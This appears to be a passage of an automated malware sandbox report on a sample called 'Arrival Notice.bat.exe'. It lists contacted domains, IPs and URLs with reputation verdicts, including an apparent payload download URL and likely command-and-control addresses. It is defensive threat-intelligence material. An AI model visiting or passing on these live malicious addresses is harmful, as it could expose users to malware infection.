              https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
              https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg100%Avira URL Cloudmalware
              http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
              https://wordpress.org/plugins/cmp-coming-soon-maintenance/0%Avira URL Cloudsafe
              https://zz.bdstatic.com/linksubmit/push.js0%Avira URL Cloudsafe
              http://www.qmancha.com/3in6/0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
              http://www.klimkina.pro/4mpz/0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
              http://www.93v0.com/hcaw/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=Xa5/huFy8Eck4v8fb+wyxg1DlrWOKGB/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNoV7by9A8iCGRjPSG14/ArJMw+NsbE1irimM=0%Avira URL Cloudsafe
              https://w.ladicdn.com/v2/source/html5shiv.min.js?v=15693102226930%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.lenovest.xyz
              		162.0.213.94
              		truetrue
                		unknown
                www.zonenail.info
                		66.29.145.248
                		truetrue
                  		unknown
                  shahaf3d.com
                  		64.46.118.35
                  		truetrue
                    		unknown
                    srripaspocon.org
                    		15.204.0.108
                    		truetrue
                      		unknown
                      www.grecanici.com
                      		35.214.235.206
                      		truetrue
                        		unknown
                        shopnow321.online
                        		162.241.2.254
                        		truetrue
                          		unknown
                          www.qmancha.com
                          		202.95.21.152
                          		truetrue
                            		unknown
                            www.klimkina.pro
                            		185.137.235.193
                            		truetrue
                              		unknown
                              dns.ladipage.com
                              		13.228.81.39
                              		truetrue
                                		unknown
                                futuregainers.net
                                		195.35.39.119
                                		truetrue
                                  		unknown
                                  www.931951.com
                                  		172.82.177.221
                                  		truetrue
                                    		unknown
                                    www.93v0.com
                                    		18.178.206.118
                                    		truetrue
                                      		unknown
                                      ndhockeyprospects.com
                                      		162.241.253.174
                                      		truetrue
                                        		unknown
                                        www.torentreprenad.com
                                        		194.9.94.86
                                        		truetrue
                                          		unknown
                                          www.okbharat.best
                                          		188.114.97.3
                                          		truetrue
                                            		unknown
                                            www.leadchanges.info
                                            		66.96.162.149
                                            		truetrue
                                              		unknown
                                              www.fr2e4o.cfd
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.shopnow321.online
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.homeppower.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.x5hh186z.skin
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.srripaspocon.org
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.shahaf3d.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.againbeautywhiteskin.asia
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.ndhockeyprospects.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.cloud-force.club
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown
                                                                www.futuregainers.net
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown
                                                                  www.navigate-power.boats
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown

                                                                    Contacted URLs

                                                                    NameMaliciousAntivirus DetectionReputation
                                                                    http://www.931951.com/2ha1/true
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://185.234.72.101/OdR8akYyHwr3ISR.exetrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.lenovest.xyz/e20q/?tF1tk6=WPritX3A9R+ySLDGPku/GD0rpC4O61Hw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRL6LWdHBkCM2rbaWuRFm/Az6wkZG2Vj0/zBQ=&8FiTp=kJrtnVsPEnF0JVtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.srripaspocon.org/egr4/?tF1tk6=OombhWzhkCuNqFAREgI5QSI/n6iJ7yj7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qC0S7x9ud02r6ucB+LtM+AWVrEw63feFc+fJU=&8FiTp=kJrtnVsPEnF0JVtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.lenovest.xyz/e20q/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.ndhockeyprospects.com/nce6/?QTth=cdSXMBmhjDz&gheP1DX=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY=true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.leadchanges.info/mjuo/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.shahaf3d.com/0a9p/true
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.zonenail.info/kscn/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.srripaspocon.org/egr4/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.shopnow321.online/41br/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=65BU6tOk0p5LPOIJv5eZvte3ybUvohRc7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rehilNLqQM6pEfZVUJ4F0gMms0MV4xVJNebQ=true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.931951.com/2ha1/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=r6q+x3A/FEQLw6gnIIDKqn7cXK90QEz4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2KETivrZrq09Pe+ZYF4dhJGLDVCdvvTj0Vf0=true
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.againbeautywhiteskin.asia/3h10/?tF1tk6=9mZLXJL8GvO5ODxaoOomsqt4kv5XiFfxC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtHTdpL9gTGqilltwgGUv9YmP3AeMh48KIxzc=&8FiTp=kJrtnVsPEnF0JVtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.torentreprenad.com/r45o/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.againbeautywhiteskin.asia/3h10/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.grecanici.com/4iea/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=LPPTutp79E4NI/FSO4tKhhCSj88LXvNdsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp+x+MZNm8bqFqjUBXzLeJ0h1+xCuEpOdbPDQ=true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.futuregainers.net/l4k7/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.shopnow321.online/41br/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.93v0.com/hcaw/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.qmancha.com/3in6/?gheP1DX=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&QTth=cdSXMBmhjDztrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.zonenail.info/kscn/?gheP1DX=CaZls2vsCC5SEDZO9v0TsRD/xR3TWESK018fdyQAavLwN8o4xbvFproXKVSs0R5JJuiJmc+bWHrVqZCkdQKET8aXg+bTbKyQsViJTM4/a4CXWVNH2Hn1tMo=&QTth=cdSXMBmhjDztrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.klimkina.pro/4mpz/?tF1tk6=Y+s3rA3a2LtNoPwXEph1agZvu5GuOlYPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4Voi3TiJN+9DCYn4mYX0I3YWd5veeVZiJYYCE=&8FiTp=kJrtnVsPEnF0JVtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.futuregainers.net/l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+QktvoJK9v8ttAQP4wg2bLqAZCOth8+1YyfQ=&8FiTp=kJrtnVsPEnF0JVtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.qmancha.com/3in6/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.93v0.com/hcaw/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=Xa5/huFy8Eck4v8fb+wyxg1DlrWOKGB/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNoV7by9A8iCGRjPSG14/ArJMw+NsbE1irimM=true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.klimkina.pro/4mpz/true
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    URLs from Memory and Binaries

                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    https://duckduckgo.com/chrome_newtabcompact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://duckduckgo.com/ac/?q=compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://185.234.72.101/OdR8akYyHwr3ISR.exejcompact.exe, 00000012.00000002.4143560755.000000000263A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designersArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://shahaf3d.com/wp-admin/admin-ajax.phpcompact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.sajatypeworks.comArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.csscompact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.founder.com.cn/cn/cTheArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.galapagosdesign.com/DPleaseArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://fburl.comcompact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.searchvity.com/?dn=compact.exe, 00000012.00000002.4147635781.0000000004DF2000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004E82000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.urwpp.deDPleaseArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.zhongyicts.com.cnArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.futuregainers.net/l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywYcompact.exe, 00000012.00000002.4147635781.00000000037F6000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003886000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2338332186.0000000032F46000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameArrival Notice.bat.exe, 00000000.00000002.1707703228.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, dLrZsz.exe, 00000009.00000002.1918612322.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, -6qxw.exe, 00000016.00000002.3127364912.0000000002472000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://static.loopia.se/shared/images/additional-pages-hero-shape.webpcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.csscompact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.googleanalytics.comcompact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.ecosia.org/newtab/compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.carterandcone.comlArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers/frere-user.htmlArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.searchvity.com/compact.exe, 00000012.00000002.4147635781.0000000004DF2000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004E82000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://tempuri.org/DataSet1.xsdSInventory_Management.Properties.ResourcesOdR8akYyHwr3ISR[1].exe.18.dr, -6qxw.exe.18.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designersGArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://optimize.google.comcompact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers/?Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.founder.com.cn/cn/bTheArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers?Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.sakkal.comx6Arrival Notice.bat.exe, 00000000.00000002.1732258181.0000000006180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://niteothemes.comcompact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.tiro.comArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://push.zhanzhang.baidu.com/push.jscompact.exe, 00000012.00000002.4147635781.00000000042F4000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004384000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://static.loopia.se/responsive/images/iOS-72.pngcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.goodfont.co.krArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.typography.netDArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.googleoptimize.comcompact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.galapagosdesign.com/staff/dennis.htmArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://static.loopia.se/shared/logo/logo-loopia-white.svgcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwecompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://youtu.be/uO1hXLmT2j4compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://klimkina.pro/4mpz/?tF1tk6=Ycompact.exe, 00000012.00000002.4147635781.0000000003B1A000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003BAA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.zonenail.infoWRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000002.4147461137.000000000500C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcompact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.fonts.comArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.sandoll.co.krArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.sakkal.comArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
